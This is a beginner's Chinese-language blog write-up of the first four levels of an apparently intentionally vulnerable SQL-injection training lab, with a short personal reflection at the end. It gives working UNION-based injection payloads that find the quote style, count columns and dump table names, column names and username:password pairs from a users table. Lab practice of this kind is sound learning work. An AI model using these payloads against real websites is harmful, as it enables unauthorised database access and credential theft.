The first

第一步:判断闭合符号,输入单引号,看看是否报错,这里就报错了,当然注释符有好多种('"#--+)这里输入单引号就行了,报错了。
根据报错信息,可以确定输入参数的内容被存放到一对单引号中间。这里我很迷,到了第二关,也是报错,先不说,就是有没有人懵逼这个报错怎么看是不是需要单引号??是什么类型的注入???和我一样的新手看到这里不懂请自动忽略,等到第二关再回来看,就会明白了,这个依据就是:你仔细看第一关和第二关的第一步报错对比一下,认真看,看看是不是第一张图片那个LIMIT前面那个1两边是有双引号的,第二张图就没有。仔细品😎😎😎
输入:

?id=1'

在这里插入图片描述
第二步:判断列数用order by语句
输入:

?id=1' order by 1--+

在这里插入图片描述
然后把1换成2,再换成3,判断下去,直到报错为止。依次判断,这里是到4,报错。
在这里插入图片描述
(附图作参考,如果没有出现这个页面,那么就是SQL语句输入错误,检查语句。)
第三步:联合注入爆数据库令 id=非正确值,这里我使id=0。
至于为什么?哪有呢么多为什么、我也不知道,hhh🤣🤣🤣

?id=0' union select 1,2,database()--+

在这里插入图片描述
这里,database()放在2或者3的位置都可以,注意,如果放在2的位置上的话,后面的3不能丢,这个错误很容易犯,所以,我就放在3的位置上,这样也不会忘。😂😂
第四步:爆数据表

?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

在这里插入图片描述
显然users是用户数据表,为什么?单词告诉我的,那三个像吗?就算猜也要给我猜这个!😎😎😎
第五步:爆字段

?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+

看到了,那么大的username,password😁😁在这里插入图片描述
最最最后一步了,爆值:

?id=0' union select 1,2,group_concat(username,0x3a,password) from users--+

0x3a意思是“:
在这里插入图片描述
这都是哈哈哈,恭喜通关!✌✌✌✌

The second

第一步:还是先判断有无闭合符号,然后输入?id=1'
在这里插入图片描述
根据报错信息确定输入的内容被带入到数据库中,也可叫做数字型注入。懵逼了没,为什么?怎么看出来的?跟第一关有什么不同?再回过头去看看文章开头第一关那里能不能看出来就靠自己了,反正我是看懂了,hhh
跟第一关的步骤一样,只是,不再需要这个'单引号了。
就不再重复了,我把结果放出来吧,证明是可行的。😜😜😜
在这里插入图片描述

The third

第三关和前面一样,只是闭合符号又不一样这次的是,,,,看圆括号
在这里插入图片描述
好了,其他还是跟上面一样,不说了,太困了,啊啊!睡觉,,今天又熬夜了,心疼我的头发,害!!对了,留一张图,证明我来过。。。。。
在这里插入图片描述
晚安,来不及回首说拜拜。

上面是一条华丽的分界线,进行下一关

The fourth

第一步仍然是判断闭合符号,先判断单引号
在这里插入图片描述
没有报错。那就不是,再试双引号

报错,根据报错信息判断出输入的内容被放到一对双引号和圆括号中啦。
接下来就该判断列数,

?id=1") order by 1--+

还是到4报错了,
在这里插入图片描述
到这里,不判断他的数据库名来试试,直接爆表名,(我看其他博主的博客有这么做的,我也来试试,省去爆库的步骤了)

?id=0") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

在这里插入图片描述
哇!真的可以。
在这里插入图片描述
解释一下哈,刚没有爆库名,所以我不知道在哪个库里面,然后,我把语句改成这样啦where table_schema=database()就是从table_schema=database(),这个库里直接爆表,也是可以的。目前刚了解到,还是先老老实实的爆先爆库名。
继续继续hhh,爆列:

?id=0") union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+

跟前几关一样了
在这里插入图片描述
最后爆值,

?id=0") union select 1,group_concat(username,0x3a,password),3 from users--+

在这里插入图片描述OK,收工~
学习感受:感觉emmmmmm, 非常有趣,说实话,我是个笨蛋,没别人记得快,我做了好多遍才记住这个步骤的,做的时候呢……忘这忘那的,很粗心,做不好又非常着急,特别容易紧张,脑子就不知道怎么想了。不过我并不比别人差,说不定他们也是练得比较多,付出的努力更多呢。而且我对这个很感兴趣,都说兴趣是最好的老师,付出肯定会得到回报,给自己喊句奥利给!!!